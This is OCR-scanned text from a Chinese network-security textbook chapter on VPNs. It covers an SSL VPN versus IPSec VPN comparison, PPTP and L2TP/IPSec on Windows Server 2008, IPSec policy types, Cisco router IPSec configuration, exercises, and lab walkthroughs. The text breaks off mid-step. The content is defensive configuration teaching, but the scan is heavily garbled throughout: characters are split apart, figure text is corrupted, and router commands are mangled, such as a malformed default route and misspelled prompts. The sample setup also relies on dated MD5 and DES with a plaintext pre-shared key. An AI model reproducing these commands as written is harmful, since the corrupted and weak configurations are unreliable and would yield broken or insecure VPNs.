对 用 户 来 说 外 部 环境 并 不 安全 ,可 达到 无 颖 连接 。 因 为 SSL VPN 只 对 通信 双方 的 某 个 应 
用 通道 进行 加 密 , 而 不 是 对 在 通信 双方 的 主机 之 间 的 整个 通道 进行 加 密 。 
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6. SSL VPN 与 IPSec VPN 比较 列表 
表 6-5 是 SSL VPN 与 IPSec VPN 主要 性 能 比较 ,从 表 中 可 以 看 出 各 自 的 主要 优势 与 不 足 。 
































表 6-5 SSL VPN 与 IPSec VPN 主要 性 能 比较 
选项 SSL VPN IPSec VPN 
单 向 身份 认证 "- 
身份 认证 双向 身份 认证 . 
数字 证 书 - 
强加 密 强加 密 
me 基于 Web 浏览 器 恢复 执行 
mm 端 到 端 安全 网 络 边缘 到 客户 端 
从 客户 到 资源 端 全 程 加 密 仅 对 从 客户 到 网 关 之 间 通 道 加 密 
可 访问 性 适用 于 任何 时 间 、 任 何 地 点 访问 适用 于 已 经 定义 好 的 受 控 用 户 访问 
费用 低 (不 需要 任何 附加 客户 端 软件 ) 高 (需要 管理 客户 端 软 件 ) 
安装 即 插 即 用 安装 通常 需要 长 时 间 的 配置 
不 需要 任何 附加 客户 端 软件 需要 客户 端 软件 .硬件 
` 对 用 户 非常 友好 ,使 用 非常 熟悉 的 Web | 。 rue" 
用 户 的 易 使 用 性 | 浏览 器 ,不 需要 北端 用 户 的 培训 对 没 用 相应 技术 的 用 户 需要 培训 
基于 Web 的 应 用 
支持 的 应 用 文件 共享 所 有 基于 IP 协议 的 服务 
E-mail 
用 户 客户 : 合作 伙伴 用 户 、 远 程 用 户 更 适用 于 企业 内 部 使 用 
m "RECEN 在 服务 器 端 容易 实现 自由 伸缩 、 在 客 








户 端 比较 困难 


图 6-24 和 图 6-25 所 示 分 别 为 IPSec VPN 与 SSL VPN 构建 方式 。 
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图 6-24 IPSec VPN 示意 图 
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Web 服 务 器 














图 6-25 SSL VPN 示意 图 


由 于 企业 的 争 相 部 署 ,SSL VPN 已 经 取得 了 很 大 的 发 展 。 同 时 ,由 于 许多 网 络 公 司 已 
经 将 该 技术 集成 到 其 当前 产品 线 中 ,最 终 将 与 企业 各 自 的 管理 应 用 相 结 合 , 将 来 SSL VPN 
会 越 来 越 普及 。 


6.5 Windows Server 2008 的 VPN 技术 


Windows Server 2008 家 族 中 支持 VPN 通信 ,并 且 增 加 了 许多 新 的 特性 。Windows 
Server 2008 的 VPN 支持 NAT, 支 持 用 户 以 L2TP 的 方式 访问 VPN 服务 器 及 内 网 。 


6.5.1 Windows Server 2008 系统 L2TP VPN 


Windows Server 2008 提供 两 种 隧道 协议 , 即 PPTP 和 附带 IPSec 的 L2TP, 可 以 方便 
地 创建 VPN. 
1. PPTP 


PPTP 是 Windows NT 4.0 的 VPN 协议 ,建立 在 PPP 基础 之 上 ,提高 了 PPP 的 安全 级 
别 , 让 PPP 对 PPTP 服务 器 与 PPTP 客户 机 之 间 的 数据 加 密 传输 ,并 使 PPTP 服务 器 对 远 
程 用 户 的 身份 进行 验证 。 

具体 过 程 是 : 一 个 PPTP 客户 机 通过 两 次 拨号 连接 来 建立 一 条 PPTP 隧道 ,第 一 次 通 
it PPP 协议 与 ISP 建立 连接 ,第 二 次 在 上 一 次 的 PPP 连接 的 基础 上 再 次 “拨号 ”建立 一 个 
与 企业 局 域 网 的 PPTP 服务 器 的 VPN 连接 。 在 局 域 网 中 也 可 以 使 用 PPTP, 如 果 客 户 机 直 
接连 接 到 IP 局 域 网 ,并 且 和 服务 器 建立 了 一 个 IP 连接 ,就 可 以 通过 局 域 网 建立 PPTP 
隧道 。 

2. 带 IPSec 的 L2TP 

iif IPSec 的 L2TP 是 Windows Server 2008 的 隧道 协议 。L2TP 隧道 化 数据 包 格式 如 
图 6-26 所 示 。 

L2TP 所 使 用 的 IPSec 安全 策略 是 由 RAS 管理 服务 专门 创建 ,不 是 使 用 默认 的 IPSec 





258 网 络 安全 技术 (第 2 版 ) 








了 P 标 头 |UDP 标 头 |L2TP 标 头 | PPP 标 头 | ”PPP 负 载 (IP 数 据 报 ) 

















T 
LE onis arm PPPp 标 头 | Ppp 负 哉 UP 数据 报 ) 


t 


IPSec IPSec 
ESP 尾 端 | 身份 验证 尾 端 


























T 
由 IPSec 加 密 


图 6-26 15 IPSec 的 L2TP 结构 示意 图 


策略 或 某 个 用 户 创 建 的 IPSec 策略 ,这 一 点 与 后 面 介绍 的 Windows 2008 IPSec 策略 在 使 用 
模式 上 不 同 。 

L2TP 负责 为 任意 类 型 的 网 络 通信 提供 封装 和 隧道 管理 ,传输 模式 的 IPSec 提供 L2IP 
隧道 数据 包 的 安全 。L2TP 安全 机 制 依赖 于 IPSec, 所 以 基于 L2TP 的 VPN 连接 是 L2TP 
和 IPSec 的 组 合 , 连 接 的 两 个 网 络 中 的 VPN 服务 器 必须 支持 L2TP 和 IPSec, 

L2TP 将 原始 数据 包 封 装 在 PPP 帧 内 并 进行 压缩 ,在 UDP 类 型 的 数据 包 内 部 指派 端 
口 1701。 因 为 UDP 数据 包 格式 是 IP 包 , 所 以 根据 L2TP 隧道 的 用 户 配置 中 的 安全 设置 ， 
L2TP 自动 使 用 IPSec 保护 隧道 。 

L2TP/IPSec VPN 安全 机 制 实现 了 计算 机 与 计算 机 之 间 的 信任 。 


6.5.2 Windows Server 2008 系统 IPSec 策略 


Windows 2008 通过 实现 基于 策略 的 IPSec 管理 避免 了 大 幅度 增加 管理 开销 ,简化 了 网 
络 安全 性 的 配置 和 管理 。 

Windows 2008 IPSec 安全 通过 与 Windows 2008 域 和 活动 目录 服务 集成 ,建立 在 IETF 
IPSec 结构 上 。 活 动 目录 使 用 组 策略 向 Windows 2003 域 成 员 提供 IPSec 策略 指定 和 分 配 。 

IKE 的 实现 提供 了 3 种 基于 IETF 标准 的 身份 认证 方法 ,以 在 计算 机 之 间 建 立信 任 
关系 。 

(1) 基于 Windows 2008 的 域 基 础 结构 提供 的 Kerberos V5.0 身份 认证 方法 用 来 在 同 
一 域 中 或 在 信任 的 域 之 间 的 计算 机 中 配置 安全 通信 。 

(2) 公开 、 私 有 密 钥 使 用 与 包括 Microsoft, Entrust, VeriSign, Netscape 在 内 的 认证 系 
统 兼容 的 认证 进行 签名 。 

(3) 口令 和 预 共享 身份 认证 密 钥 严格 地 用 在 为 应 用 程序 数据 包 保护 建立 的 信任 上 。 

一 旦 端 计算 机 通过 了 相互 身份 认证 ,它们 会 为 加 密 应 用 程序 数据 包 的 目的 产生 整体 加 
密 密 钥 。 这 些 密 钥 仅 被 这 两 台 计 算 机 知道 ,所 以 它们 的 数据 被 很 好 地 保护 起 来 ,防止 了 网 络 
上 可 能 的 攻击 者 对 数据 进行 修改 或 翻译 。 

Windows 2008 预定 义 的 3 种 IP 安全 策略 ,用 户 可 以 根据 实际 通信 需要 自行 创建 新 的 
IP 安全 策略 。 

CD 客户 端 (只 响应 )。 这 是 一 个 计算 机 策略 示例 ,其 根据 请 求 而 保护 通信 。 例 如 ， 
Intranet 客户 机 可 能 不 需要 IPSec, 除 非 男 一 台 计算 机 发 出 请 求 。 该 策略 允许 其 活动 的 计算 
机 正确 响应 安全 通信 请 求 ,该 策略 包含 默认 响应 规则 ,该 规则 根据 正在 保护 的 通信 为 和 站 与 
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出 站 创建 动态 IPSec 筛选 器 。 

(2) 服务 器 (请 求 安全 设置 )。 这 是 一 个 在 多 数 情 况 下 保护 通信 的 计算 机 策略 示例 , 同 
时 也 允许 与 不 支持 IPSec 的 计算 机 进行 不 安全 通信 。 在 该 策略 中 ,计算 机 接受 不 安全 通信 ， 
但 总 是 通过 从 原始 发 送 方 那里 请 求 安全 性 来 试图 保护 其 他 通信 。 如 果 另 一 台 计算 机 没有 局 
用 IPSec, 则 该 策略 允许 整个 通信 都 是 不 安全 的 。 

(3) 安全 服务 器 (要 求 安全 设置 )。 这 是 一 个 在 Intranet. 上 要 求 进行 安全 通信 的 计算 机 
策略 示例 ,如 传输 高 度 敏 感 数据 的 服务 器 。 管 理 员 可 将 该 IPSec 策略 作为 示例 创建 自己 用 
于 生产 的 自 定义 IPSec 策略 。 在 该 策略 中 使 用 的 筛选 器 要 求 对 所 有 出 站 通信 进行 保护 , 同 
时 允许 不 被 保护 的 初始 人 站 通信 请 求 。 

要 测试 该 策略 的 使 用 情况 ,应 把 该 策略 指派 给 服务 器 计算 机 ,并 把 "客户 端 (只 响应 )” 策 
略 指派 给 客户 端 计算 机 , 当 客 户 端 计算 机 试图 与 服务 器 通信 时 ,服务 器 将 请 求 安全 的 通信 。 
此 外 ,不 支持 IPSec 性 能 的 计算 机 无 法 与 服务 器 建立 连接 。 


6.5.3 Windows Server 2008 系统 SSL VPN 


Windows 2008 IIS 的 身份 认证 除了 匿名 访问 、 基 本 验证 和 Windows NT 请 求 / 响 应 模 
式 外 ,还 有 一 种 安全 性 更 高 的 认证 ,就 是 通过 SSL 安全 机 制 使 用 数字 证 书 。SSL 位 于 
HTTP 和 TCP J l] ,建立 用 户 与 服务 器 之 间 的 加 密 通 信 , 确 保 所 传递 信息 的 安全 性 。 
SSL 是 工作 在 公共 密 钥 和 私人 密 钥 基础 上 的 ,任何 用 户 都 可 以 获得 公共 密 钥 来 加 密 数据 ， 
但 解密 数据 必须 要 通过 响应 的 私人 密 钥 。 使 用 SSL 安全 机 制 时 ,首先 客户 端 与 服务 器 端 建 
立 连接 ,服务 器 把 它 的 数字 证 书 与 公共 密 钥 一 并 发 送 给 客户 端 ,客户 端 随机 生成 会 话 密 钥 ， 
用 从 服务 器 得 到 的 公共 密 钥 对 会 话 密 钥 进 行 加 密 , 并 把 会 话 密 钥 在 网 络 上 传递 给 服务 器 ,而 
会 话 密 钥 只 有 在 服务 器 端 用 私人 密 钥 才 能 解密 ,这 样 ,客户 端 和 服务 器 就 建立 了 一 个 唯一 的 
安全 通道 。 建 立 了 SSL 安全 机 制 后 ,只 有 SSL 允许 客户 端 才能 与 SSL 允许 的 Web 站 点 进 
行 通 信 ,并且 在 使 用 URL 资源 定位 器 时 ,输入 https:// ,而 不 是 http://。 





6.6 基于 路 由 器 的 IPSec VPN 配置 


IPSec VPN 的 配置 一 般 分 为 4 步 : 配置 IKE 的 协商 ; 配置 IPSec 的 协商 ; 配置 端口 的 
应 用 ; 调试 并 排 错 。 
(OD 启动 IKE; 


Router(config) # crypto isakmp enable 

(2) 建立 IKE 协商 策略 : 

Router(config)# crypto isakmp policy priority 
(3) 配置 IKE 协商 策略 : 


Router(config — isakmp) # authentication pre- share 
Router(config- isakmp) # encryption { des | 3des } 
Router(config - isakmp) # hash ( md5 | shal ] 
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Router(config- isakmp) 并 lifetime seconds 

(4) 设置 共享 密 钥 和 对 端 地址 ; 

Router(config) # crypto isakmp key keystring address peer - address 
(5) 设置 传输 模式 集 : 


Router (config) # crypto ipsec transform - set transform - set - name transforml [transform2 


[transform3]] 


(6) 配置 保护 访问 控制 列表 ; 


Router(config) 井 access - list access - list - number (deny | permit) protocol source source — 


wildcard destination destination ~ wildcard 

(7) 创建 Crypto Maps: 

Router(config) # crypto map map - name seq - num ipsec - isakmp 
(8) 配置 Crypto Maps: 


Router( config - crypto - map) # match address access - list - number 
Router(config- crypto - map) # set peer ip address 
Router(config- crypto- map) it set transform- set name 


(9) 应 用 Crypto Maps 到 端口 : 


Router(config)it interface interface name interface num 
Router(config- if)it crypto map map - name 


(10) 查看 IKE 策略 : 

Router show crypto isakmp policy 

(11) 查看 IPsce 策略 : 

Routerit show crypto ipsec transform - set 
(12) 查看 SA 信息 : 

Router# show crypto ipsec sa 

(13) 查看 加 密 映 射 

Router show crypto map 


如 图 6-27、 图 6-28 分 别 为 拓扑 结构 和 操作 步骤 。 


50.50.50.50 60.60.60.60 
20.20.20.21 20.20.20.20 


加 Fla "e E 


6-27 拓扑 结构 
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RouterA(config)#ip route 0.0.0.0.0.0.0.0 20.20.20.20 NS 


RouterA(config)&crypto isakmp policy 1 

RouterA(config-isakmap)£hash md5 
RouterA(config-isakmap)£authentication pre-share 
RouterA(config)écrypto isakmp key benet-password address 20.20.20.20 
RouterA(config)crypto ipsec transform-set benetset ah-md5-hmac 
esp-des 

RouterA(config)Zaccess-list 101 permit ip 50.50.50.0.0.0.0.255 60.60.60.0 
0.0.0.255 

RouterA(config)/crypto map benetmap 1 ipsec-isakmp 
RouterA(config-crypto-map)£set peer 20.20.20.20 
RouterA(config-crypto-map)?set transform-set benetset 
RouterA(config-crypto-map)/match address 101 


RouterA(config)Zinterface serial 0/0 
RouterA(config-if)& crypto map benetmap Bp; 


628 ”操作 步骤 








习 题 6 


6-1 什么 是 VPN? VPN 的 系统 特性 有 哪些 ? 

6-2 IPSec 协议 包含 的 各 个 协议 之 间 有 什么 关系 ? 

6-3 说 明 AH 的 传输 模式 和 隧道 模式 ,它们 的 数据 包 格式 是 什么 样 的 ? 
6-4 说 明 ESP 的 传输 模式 和 隧道 模式 ,它们 的 数据 包 格 式 是 什么 样 的 ? 
6-5 IKE 的 作用 是 什么 ? SA 的 作用 是 什么 ? 

6-6 SSL 工作 在 哪 一 层 ? 工作 原理 是 什么 ? 

6-7 ”对 SSL VPN 与 IPSec VPN 进行 简单 的 比较 。 

6-8 L2TP 协议 的 优点 是 什么 ? 


实 训 6.1 Windows Server 2008 的 L2TP VPN 配置 


【 实 训 目 的 】 


Windows 2008 支持 PPTP 和 L2TP 的 VPN 数据 链 路 层 隧道 协议 ,在 Windows 2008 
服务 器 端 通过 “路 由 和 远程 访问 ”就 能 创建 VPN 服务 器 ,接受 远程 “虚拟 专用 连接 ”。 使 
Windows 2008 计算 机 成 为 VPN 服务 器 ,在 客户 端 和 VPN 服务 器 建立 安全 连接 。 


【 实 训 环境 】 


(1) 一 台 装 有 Windows Server 2008 的 计算 机 作为 VPN 服务 器 。 
(2) 一 台 装 有 Windows Server 2008 的 计算 机 作为 客户 端 。 
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【 实 训 内 容 】 


1. 配置 PPTP 服务 端 

(1) 从 “管理 工具 ”中 运行 “路 由 和 远程 访问 *,“ 路 由 和 远程 访问 "默认 是 禁用 的 , 右 击 服 
务 器 图 标 , 选 择 快捷 菜单 中 的 “配置 并 启用 路 由 和 远程 访问 "命令 ,如 图 6-29 所 示 。 在 安装 
向 导 中 单 击 “ 下 一 步 "按钮 。 


路 由 和 远程 访问 








图 6-29 启用 路 由 与 远程 访问 


(2) 在 弹出 的 对 话 框 中 ,选中 “远程 访问 (拨号 或 VPN) "选项, 单 击 “ 下 一 步 ” 按 钮 ,选中 
VPN , 单 击 “下 一 步 "按钮 。 
(3) 在 弹出 的 对 话 框 中 保持 默认 设置 , 单 击 * 下 一 步 "按钮 ,如 图 6-30 所 示 o 


VPN 连接 ` 
mer VEN 客户 端 连 接 到 此 服务 器 ， 至 少 要 有 一 个 网 络 接口 连接 到 | »| 
ternete 





SHC EZ Card 10/10... 192 168 0.55. 





图 6-30 配置 VPN 
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(4) 在 “IP 地 址 指定 ”对 话 框 中 ,选中 “来 自 一 个 指定 的 地 址 范围 ”选项 , 单 击 “ 下 一 步 ” 
按钮 。 

(5) 在 “地 址 范围 指定 ”区 域 中 , 单 击 “ 新 建 " 按 钮 ,出 现 “ 新 建 地 址 范围 ”对 话 框 ,设置 “起 
tA IP 地 址 ”为 192. 168. 0. 51,“ 结 束 IP 地 址 ?为 192. 168. 0. 58, 单 击 “ 确 定 ” 按 钮 ,返回 上 一 
级 对 话 框 。 此 时 可 看 到 地 址 范围 已 添加 成 功 , 单 击 * 下 一 步 ?按钮 ,如 图 6-31 所 示 。 


192.168. 0 . 51 
192.168. 0 . 58 


管理 多 个 运程 访问 最 务 器 t 
PASA FLU. i uu a Pia 2L 





mA] TE mm | 
图 6-31 配置 IP 地 址 


(6) 在 “路 由 和 远程 访问 服务 器 安装 向 导 ” 对 话 框 中 ,保持 默认 设置 , 单 击 “ 下 一 步 ” 按 
钮 ,再 单 击 “ 完 成 ”按钮 ,结束 服务 器 配置 。 然 后 计算 机 开始 启动 路 由 服务 ,如 图 6-32 所 示 。 





图 6-32 启动 路 由 服务 


(7) 打开 “计算 机 管理 ”窗口 ,分 别 创建 一 个 用 户 r_user, 一 个 组 r_userg, 且 使 r_user $ 
属于 r_userg。 用 户 r user 的 “ 拨 入 ”属性 设置 如 图 6-33 所 示 。 

(8) 回 到 “路 由 和 远程 访问 ”窗口 ,选中 “远程 访问 策略 ”选项 , 右 侧 窗口 默认 显示 “身份 
验证 _ 连 接 VPN” 选 项 ,如 图 6-34 所 示 。 
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图 6-33 创建 组 合用 户 


身份 验证 JERETY 
pass DA Microsoft Bis RHQISIUS RR BUS : 
i FRRO 车 到 KK 它 访问 服务 器 的 演 接 











图 6-34 VPN 连接 


右 击 “身份 验证 _ 连 接 VPN” 选 项 ,选中 快捷 菜单 中 的 “属性 ”命令 ,出 现 图 6-35 所 示 对 
话 框 , 单 击 “ 删 除 ” 按 钮 ,删除 默认 条 件 。 

在 “身份 验证 _ 连 接 VPN 属性 "对话 框 中 , 单 击 “ 添 加 ”按钮 ,打开 “选择 属性 ”, 选 中 
Windows-Groups 选项 , 单 击 “ 添 加 ”按钮 ,如 图 6-36 所 示 。 

(9) 在 “选择 组 ”对 话 框 中 选择 r_userg 选项 , 单 击 “ 确 定 ” 按 钮 , 回 到 “身份 验证 _ 连 接 
VPN 属性 ”对 话 框 中 ,选中 “授予 远程 访问 权限 ” 单 选 按钮 ,如 图 6-37 所 示 。 
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到 其 他 态 问 服 务 器 的 连接 EEE 





图 6-37 ”授予 远程 访问 权限 
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aeh 验证 _ 连接 VPN ap Pai 单 击 “编辑 配置 文件 按钮 , 即 可 进行 身 
份 验证 和 加 密 配置 , 单 击 “ 确 定 ” 按 钮 ,结束 配置 ,如 图 6-38 和 图 6-39 所 示 。 





EE [z [>] 总 辑 技 入 配置 文件 [7 [>] 
所 入 限制 | IP — | 多 重 链接 ”身份 验证 | 加 灾 | 高 级 | 撕 入 限制 | IP sms] 身份 验证 me | 高 级 | 
选择 娩 想 允许 此 连接 使 用 的 身份 验证 方法 。 p nre 路 | Ej je un rai 
加 果 只 选择 了 “无 加 密 ”， 则 用 户 不 能 通过 数据 加 密 进 行 连接 。 


IV Microsoft 加 密 身份 验证 版 本 2 0IS-CHAP v2) (2) 
Iv 用 户 可 以 在 密码 过 期 后 更 改 它 (C) 

TV Microsoft MESANE MS-CHAP) W) 
Tv 用 户 可 以 在 密码 过 期 后 更 改 它 S) 


F BEES Wr 40 RD Q): 
F MESE OPE S6 位 ) G) 
Tv 景 强加 密 rre 128 位 ) (D. 























T- jn: ri hap) QD T Dn 
厂 未 加 密 的 身份 验证 PAP, SPAP) QD 
未 经 身份 验证 的 访问 
T- 区 洗 客户 端 连 接 而 不 融 要 协商 身份 验证 方法 W. 
m= Lu] ERO [ we ] ma ER QD 
6-38 ”身份 验证 图 6-39 加 密 配 置 





QD 在 “网 络 连接 ?窗口 ,可 以 看 到 "传人 的 连接 ?图标 ,表示 服务 器 端 等 待 与 客户 端 建 
Etk. 
(12) 如 图 6-40 所 示 ,在 命令 提示 符 界 面 , 输 入 命令 IPconfig/all 可 以 看 到 其 网 卡 IP 地 


址 和 新 建 的 W AN 过 PPP/VSLIP> 地 址 , 即 虚拟 专用 网 地 址 








: vimp 
Node Type . ois - = Unknown 
IP Routing Enabled. . . - -= No 
WINS Proxy Enabled. . . . “s No 


[Ethernet adapter 本 地 连 


Connection-specif ic DNS 
: UMware ñccelerated AMD PCNet Adapter] 


90-9C-29-EC-77-86 


VAN KPPP/SLIP) Interface 
90-53-45-08-00-00 


Gatevay 
DNS Servers 








图 6-40 虚拟 专用 网 地 址 
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2. 配置 PPTP 客户 端 

CD 打开 “网 络 连 接 ” 窗 口 ,双击 “新 建 连接 "图标 ,在 打开 的 “新 建 连接 向 导 ” 对 话 框 中 单 
击 “ 下 一 步 ” 按 钮 ; 在 弹出 的 对 话 框 中 选中 “连接 到 我 工作 场所 的 网 络 " 单 选 按钮 , 单 击 “ 下 一 
步 ?按钮 ; 选中 “虚拟 专用 网 络 连 接 ” 单 选 按 钮 ,如 图 6-41 所 示 。 





欢迎 使 用 新 建 连接 向 导 
此 疝 导 将 帮助 您 


* 连接 到 Internet。 
* 连接 到 专用 网 络 ， 例 如 您 的 办 公 网 络 。 


要 继续 ,请 单 击 “ 下 一 步 ”。 











新 建 连接 向 导 


网 络 连 接 
您 想 要 在 工作 点 如 何 与 网 络 连 接 ? 


Luz: 3 


C siw 
EAEE » 或 通过 综合 业务 数字 网 ASIM ERE 


使 用 虚拟 专用 网 络 WP 通过 Internet 连接 到 网 络 。 





«r-sem[r-5m»] mm | 
图 6-41 客户 端 网 络 连 接 


G) # A" VPN 服务 器 ”的 IP 地 址 , 单 击 “ 下 一 步 "按钮 ,如 图 6-42 所 示 。 

(4) 在 对 话 框 中 保持 默认 设置 , 单 击 "下 一 步 按 钮 ; 在 “Internet 连接 共享 ”对 话 框 中 也 
保持 默认 设置 , 单 击 “ 下 一 步 ” 按 钮 “可 修改 连接 名 称 ”, 再 单 击 “ 完 成 ”按钮 ,结束 客户 端 配 
置 , 如 图 6-43 Br. 

(5) 在 “网 络 虚拟 连接 ”窗口 中 ,双击 所 建 的 连接 图 标 ; 在 弹出 的 对 话 框 中 输入 “用 户 
名 ”和 “口令 ”, 单 击 “ 连 接 ” 按 钮 ,与 服务 器 建立 连接 ,如 图 6-44 所 示 。 

(6) 连接 完成 , 单 击 “ 确 定 ” 按 钮 ,在 客户 端 上 Ping 服务 端的 IP 地 址 成 功 。 
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新 建 连接 向 导 


YP 服务 器 选择 
VEN. 服务 器 的 名 称 或 地 址 是 什么 ? 








输入 您 正 连接 的 计算 机 的 主机 名 或 IF Hik. 


主机 名 或 IP 地 址 (例如 ,nicrosoft. com 或 157.54.0.1) 0D 





192. 168.0. 55] 








«i-e [TEN] _ ma 








图 6-42 


正在 完成 新 建 连接 向 导 
您 已 成 功 完成 创建 下 列 连接 需要 的 上 又 


虚拟 专用 网 络 连接 
。 与 此 计算 机 上 的 所 有 用 户 共享 


此 连接 将 被 存 入 “网 络 连 接 ” 廊 件 夹 。 


T: RERRSSUS ESI DEOS EBSURHURSSE G) 


要 创建 此 连接 并 关闭 向 导 ， 单 击 “ 完 成 ”。 








so x4 o] m 


VPN 服务 器 地 址 


ER 虚拟 专用 网 络 连接 





APW: [ue 














sap. [eme 
[ 为 下 面 用 户 保存 用 户 名 和 更 码 G); 

R EREM 

C ETERRA (A) 
取消 meo [Son 





6-43 客户 端 配置 完成 


图 6-44 客户 端 连接 


实 训 6.2 Windows Server 2008 的 IPSec VPN 配置 


【 实 训 目的 】 


配置 VMnetl 和 VMnet3 使 用 IPSec 隧道 方式 进行 加 密 连接 。 


【 实 训 环境 】 


在 VMware 上 建立 3 个 Hostonly 网 络 ,模拟 两 个 局 域 网 和 3 个 网 段 ,每 个 局 域 网 含 一 
£ Windows Server 2008 和 一 台 Windows XP, 具 体 网 络 拓扑 如 图 6-45 所 示 。 
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VMnet | VMnet3 
192.168.141.0 192.168.136.0 
E2 192.168.162.10 E2 192.168.162.20| 




















Server A Server B 
š VMnet 2 $ 
E1 192.168.141.10 192.168.162.0 E1 192.168.136.20 
PCA PCB ® 
192.168.141.100 192.168.136.100 
网 关 192.168.141.10 网 关 192.168.136.20 
图 6-45 网 络 拓扑 


【 实 训 内 容 】 


1. 创建 IPSec 策略 (Server A) 

COD 管理 工具 ,打开 “本 地 安全 设置 "窗口 , 右 击 “IP 安全 策略 ,在 本 地 计算 机 ”选项 ,在 快 
捷 菜单 中 选择 “创建 IP 安全 策略 ”命令 ,在 弹出 的 对 话 框 中 命名 为 AB, 取 消 * 激 活 默认 响应 
规则 ”"。 编 辑 AB|* 属 性 ”, 添 加 新 规则 (不 使 用 添加 向 导 ), 如 图 6-46 所 示 。 


e GERZ4) 。 对 所 有 mn 通讯 总 是 使 
SPM (USED 正常 通讯 FRM). 
问安 全 服务 器 (二 要 对 所 有 IT 通讯 总 是 便 





图 6-46 创建 IP 安全 策略 


(2) 添加 “IP 筛选 器 列表 ”, 命 名 为 A to B, 添 加 属性 (不 使 用 添加 向 导 )。 设 置 “ 源 地 址 ” 
为 “特定 IP 子 网 ”192. 168. 141.0,“ 目 的 地 址 ?设置 为 “特定 IP 子 网 ”192. 168. 136. 0。 取 消 
选中 “镜像 " 复 选 框 ,“ 协 议 ” 选 项 卡 设 定 为 默认 值 * 任 意 ”, 如 图 6-47 所 示 。 

(3)“ 筛 选 器 操作 ”( 不 使 用 添加 向 导 ) :“ 安 全 方法 ”为 “协商 安全 ”,“ 新 增 安全 方法 ”为 
“完整 性 和 加 密 ”, 如 图 6-48 所 示 。 

CD 在 “身份 验证 方法 属性 ”中 ,使 用 “ 预 共享 密 钥 ” 为 Microsoft. [E 6-49 所 示 。 

(5) 隧道 设置 ,指定 “隧道 终点 由 此 IP 地 址 指定 ”, 如 图 6-50 所 示 。 

(6)“ 连 接 类 型 "为 “所 有 网 络 连接 ”, 如 图 6-51 所 示 。 

(7) 重复 步骤 (2) —- (60 ,创建 IP 筛选 器 列表 B to A. 

(8) 在 “本 地 安全 设置 "中 , 右 击 “策略 AB” ,选择 “指派 ”命令 。 
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= 
BRASO. SSEHBSHOE GdBAELEE TRE ROBUR NETE. 





6-47 


IP 筛选 器 列表 









































新 IP 安全 策略 属性 | Gugpam m 

规则 sQ IPTREREDER unmute 
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图 6-48 ”筛选 器 操作 
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IP 安全 规则 (1): 
O Active Directory 默认 值 (Kerberos V5 协议 )(D) 
pams) [方法 
Haws p es 
D «ae» 
门 从 证 书 请 求 中 排除 CA SERO 














6-49 预 共 享 密 钥 


新 规则 Ett 


图 6-50 终点 IP 地 址 
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图 6-51 连接 类 型 


2. 创建 IPSec 策略 (Server B) 

重复 步骤 1, 创 建 Server B 的 IP 安全 策略 并 指派 。 

3. 配置 远程 访问 /VPN 服务 器 

“管理 您 的 服务 器 ”| * 添 加 删除 角色 ”| * 远 程 访 问 /VPN 服务 器 ”, 当 Window Server 
2003 配置 成 “路 由 服务 器 ?时 ,才能 作客 户 端的 默认 网 关 。 

4. Ping 测试 (PC A) 

在 cmd 中 输入 “之 ping-t 192. 168. 136. 100. / /" .-t 参数 表示 一 直 Ping 下 去 ,直到 按 Ctrl 十 
C 组 合 键 停止 。 如 果 两 方 的 IPSec 策略 未 配置 正确 ,不 会 Ping 通 。 注 意 : 如 果 按 本 试验 设 
置 为 两 个 网 段 组 成 IPSec 隧道 , 则 不 要 使 用 NAT。 使 用 NAT 意味 着 是 两 个 特定 IP 地 址 ， 
如 图 6-52 所 示 。 











图 6-52 特定 卫 地 址 
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5. IP 安全 监视 器 


运行 中 输入 MMC ,打开 控制 台 , 添 加 *IP 安全 监视 器 ”, 定 位 到 “统计 ”, 查 看 信息 ,如 
图 6-53 所 示 。 





ÑE 文件 (F) SA SEV) ”收藏 夫 (O) SOW EAH) 
e+ mm B Hr 
0j 控制 台 根 节点 
v IP 安全 监视 器 
v Ë DeskTop 
Cy mem 








Mo sss eee s s g 














ooooooocooc 





图 6-53 安全 监视 器 


在 “控制 面板 ”窗口 中 双击 “添加 删除 Windows 组 件 项 ,打开 “Windows 组 件 向 导 ” 对 
话 框 。 在 “Windows 组 件 ? 页 面 中 ,选中 “管理 和 监视 工具 ” 复 选 框 。 单 击 “ 详 细 信息 ?按钮 ， 
打开 “管理 和 监视 工具 ”对 话 框 ,选中 “网 络 监视 工具 ” 复 选 框 , 单 击 “ 确 定 ” 按 钮 ,完成 网 络 监 
视 工 具 的 添加 。 

选择 “开始 ”|“ 管 理工 具 ”| “网络 监视 器 ”命令 ,打开 “网 络 监视 器 "窗口 。 完 成 相应 的 操 
作 后 ,捕获 的 数据 如 图 6-54 所 示 。 


Microsoft AARRE 
XH) RAD Exc IAV HR) HOV ED 


aluj Helt a FEER +t viel aln] ei ?| 














图 6-54 网 络 监 视 器 
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实 训 6.3 Windows Server 2008 的 SSL VPN 配置 


【 实 训 目的 】 


SSL 是 使 用 公 钥 和 私 钥 技术 组 合 的 安全 网 络 通信 协议 ,可 以 实现 客户 机 和 服务 器 的 双 
向 身份 认证 和 数据 的 机 密 性 。 通 过 正确 配置 并 实现 SSL 协议 在 IIS WWW 服务 器 的 安全 
应 用 ,从 而 理解 口令 技术 在 网 络 安全 系统 构建 中 的 作用 ,分 析 安 全 协议 的 执行 过 程 和 结果 ， 
掌握 SSL VPN 的 配置 方法 。 


【 实 训 环境 】 


两 台 安装 Windows 操作 系统 的 计算 机 ,其 中 一 台 必 须 安 装 Windows Server 2008 或 
2008 服务 器 ,并 且 安 装 证 书 服务 。 


【 实 训 内 容 】 

在 Windows 环境 下 配置 并 实现 SSL 协议 ,包括 用 服务 器 端 和 客户 端 设置 以 及 SSL 
测试 。 

1. SSL 服务 器 端的 设置 


COD. 进入 “Internet 服务 管理 器 ”, 创 建 一 个 名 为 “默认 网 站 ”的 Web 站 点 。 站 点 创建 好 
以 后 , 右 击 “默认 网 站 ”, 选 择 快捷 菜单 中 的 “属性 ”命令 ,如 图 6-55 所 示 。 





图 6-55 服务 管理 器 


单 击 “ 服 务 器 证 书 ” 按 钮 ,弹出 图 6-56 所 示 的 对 话 框 。 
(2) 选中 “新 建 证 书 ” 单 选 按 钮 , 单 击 “ 下 一 步 ” 按 钮 ,出 现 图 6-57 所 示 的 界面 。 
单 击 “下 一 步 "按钮 ,生成 文件 certreq. txt ,出 现 图 6-58 所 示 的 界面 。 
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图 6-57 新 建 证 书 


证 书 请 求 文件 名 
以 指定 的 文件 名 将 证 书 请 求 保存 为 文本 文件 。 


es 








图 6-58 生成 文件 certreq. txt 
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(3) 单 击 * 下 一 步 "按钮 ,生成 一 个 证 书 申请 文件 。 在 浏览 器 上 打开 http: //192. 168. 
